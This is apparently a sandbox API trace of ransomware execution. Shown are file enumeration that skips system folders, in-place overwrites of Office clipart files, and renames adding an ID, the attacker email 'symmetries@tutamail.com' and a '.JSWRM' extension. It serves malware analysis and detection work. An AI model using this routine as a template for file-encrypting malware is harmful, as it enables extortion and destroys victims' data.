[0097.734] lstrcmpiW (lpString1="SO02269_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0097.734] lstrcmpiW (lpString1="SO02269_.WMF", lpString2="system volume information") returned -1 [0097.734] lstrcmpiW (lpString1="SO02269_.WMF", lpString2="msocache") returned 1 [0097.734] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0097.734] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02269_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.734] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02269_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO02269_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.734] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0097.734] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0097.734] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02269_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.734] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02269_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO02269_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.735] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0097.735] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0097.735] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0097.735] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0097.735] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0097.735] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0097.735] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02269_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02269_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0097.735] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2800) returned 1 [0097.735] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.735] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xaf0) returned 0x23fc98 [0097.735] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xaf0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xaf0, lpOverlapped=0x0) returned 1 [0097.737] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.737] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xaf0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xaf0, lpOverlapped=0x0) returned 1 [0097.737] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0097.737] CloseHandle (hObject=0x314) returned 1 [0097.737] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0097.737] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0097.737] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0097.737] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0097.737] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0097.738] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0097.738] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0097.738] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a480 [0097.738] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a480, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0097.738] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a480 | out: hHeap=0x1e0000) returned 1 [0097.738] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0097.738] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0097.738] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0097.738] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0097.738] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02269_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02269_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02269_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02269_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0097.739] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0097.739] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0097.739] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0097.739] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1041ec4b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1041ec4b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1041ec4b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa68, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO02270_.WMF", cAlternateFileName="")) returned 1 [0097.739] lstrcmpiW (lpString1="SO02270_.WMF", lpString2=".") returned 1 [0097.739] lstrcmpiW (lpString1="SO02270_.WMF", lpString2="..") returned 1 [0097.739] lstrcmpiW (lpString1="SO02270_.WMF", lpString2="...") returned 1 [0097.739] lstrcmpiW (lpString1="SO02270_.WMF", lpString2="windows") returned -1 [0097.739] lstrcmpiW (lpString1="SO02270_.WMF", lpString2="recovery") returned 1 [0097.739] lstrcmpiW (lpString1="SO02270_.WMF", lpString2="perflogs") returned 1 [0097.739] lstrcmpiW (lpString1="SO02270_.WMF", lpString2="documents and settings") returned 1 [0097.739] lstrcmpiW (lpString1="SO02270_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0097.739] lstrcmpiW (lpString1="SO02270_.WMF", lpString2="system volume information") returned -1 [0097.739] lstrcmpiW (lpString1="SO02270_.WMF", lpString2="msocache") returned 1 [0097.739] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0097.739] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02270_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.739] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02270_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO02270_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.739] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0097.739] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0097.739] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02270_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.739] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02270_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO02270_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.739] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0097.739] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0097.739] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0097.739] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0097.739] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0097.739] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0097.739] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02270_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02270_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0097.740] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2664) returned 1 [0097.740] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.740] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa60) returned 0x22fd48 [0097.741] ReadFile (in: hFile=0x314, lpBuffer=0x22fd48, nNumberOfBytesToRead=0xa60, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x22fd48*, lpNumberOfBytesRead=0x345e89c*=0xa60, lpOverlapped=0x0) returned 1 [0097.791] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.792] WriteFile (in: hFile=0x314, lpBuffer=0x22fd48*, nNumberOfBytesToWrite=0xa60, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x22fd48*, lpNumberOfBytesWritten=0x345e898*=0xa60, lpOverlapped=0x0) returned 1 [0097.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22fd48 | out: hHeap=0x1e0000) returned 1 [0097.792] CloseHandle (hObject=0x314) returned 1 [0097.792] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0097.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0097.792] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0097.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0097.792] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0097.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0097.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0097.792] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0097.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0097.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0097.792] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0097.792] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0097.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0097.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0097.792] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02270_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02270_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02270_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02270_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0097.794] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0097.794] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0097.794] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0097.794] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1041ec4b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1041ec4b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1041ec4b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x30e4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO02276_.WMF", cAlternateFileName="")) returned 1 [0097.794] lstrcmpiW (lpString1="SO02276_.WMF", lpString2=".") returned 1 [0097.794] lstrcmpiW (lpString1="SO02276_.WMF", lpString2="..") returned 1 [0097.794] lstrcmpiW (lpString1="SO02276_.WMF", lpString2="...") returned 1 [0097.794] lstrcmpiW (lpString1="SO02276_.WMF", lpString2="windows") returned -1 [0097.794] lstrcmpiW (lpString1="SO02276_.WMF", lpString2="recovery") returned 1 [0097.794] lstrcmpiW (lpString1="SO02276_.WMF", lpString2="perflogs") returned 1 [0097.794] lstrcmpiW (lpString1="SO02276_.WMF", lpString2="documents and settings") returned 1 [0097.794] lstrcmpiW (lpString1="SO02276_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0097.794] lstrcmpiW (lpString1="SO02276_.WMF", lpString2="system volume information") returned -1 [0097.794] lstrcmpiW (lpString1="SO02276_.WMF", lpString2="msocache") returned 1 [0097.794] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0097.794] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02276_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.794] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02276_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO02276_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.794] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0097.794] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0097.794] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02276_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.794] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02276_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO02276_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.794] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0097.794] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0097.794] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0097.795] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0097.795] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0097.795] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0097.795] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02276_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02276_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0097.795] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=12516) returned 1 [0097.795] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.795] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30e0) returned 0x24d210 [0097.795] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x30e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x30e0, lpOverlapped=0x0) returned 1 [0097.798] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.798] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x30e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x30e0, lpOverlapped=0x0) returned 1 [0097.798] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0097.798] CloseHandle (hObject=0x314) returned 1 [0097.798] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0097.798] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0097.798] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0097.798] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0097.798] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0097.798] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0097.798] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0097.798] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0097.798] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0097.798] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0097.798] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0097.798] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0097.798] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0097.798] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0097.798] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02276_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02276_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02276_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02276_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0097.799] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0097.799] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0097.799] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0097.799] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103d2836, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103d2836, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103f89f0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x17a1c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO02413_.WMF", cAlternateFileName="")) returned 1 [0097.799] lstrcmpiW (lpString1="SO02413_.WMF", lpString2=".") returned 1 [0097.800] lstrcmpiW (lpString1="SO02413_.WMF", lpString2="..") returned 1 [0097.800] lstrcmpiW (lpString1="SO02413_.WMF", lpString2="...") returned 1 [0097.800] lstrcmpiW (lpString1="SO02413_.WMF", lpString2="windows") returned -1 [0097.800] lstrcmpiW (lpString1="SO02413_.WMF", lpString2="recovery") returned 1 [0097.800] lstrcmpiW (lpString1="SO02413_.WMF", lpString2="perflogs") returned 1 [0097.800] lstrcmpiW (lpString1="SO02413_.WMF", lpString2="documents and settings") returned 1 [0097.800] lstrcmpiW (lpString1="SO02413_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0097.800] lstrcmpiW (lpString1="SO02413_.WMF", lpString2="system volume information") returned -1 [0097.800] lstrcmpiW (lpString1="SO02413_.WMF", lpString2="msocache") returned 1 [0097.800] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0097.800] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02413_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.800] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02413_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO02413_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.800] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0097.800] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0097.800] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02413_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.800] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02413_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO02413_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.800] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0097.800] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0097.800] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0097.800] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, 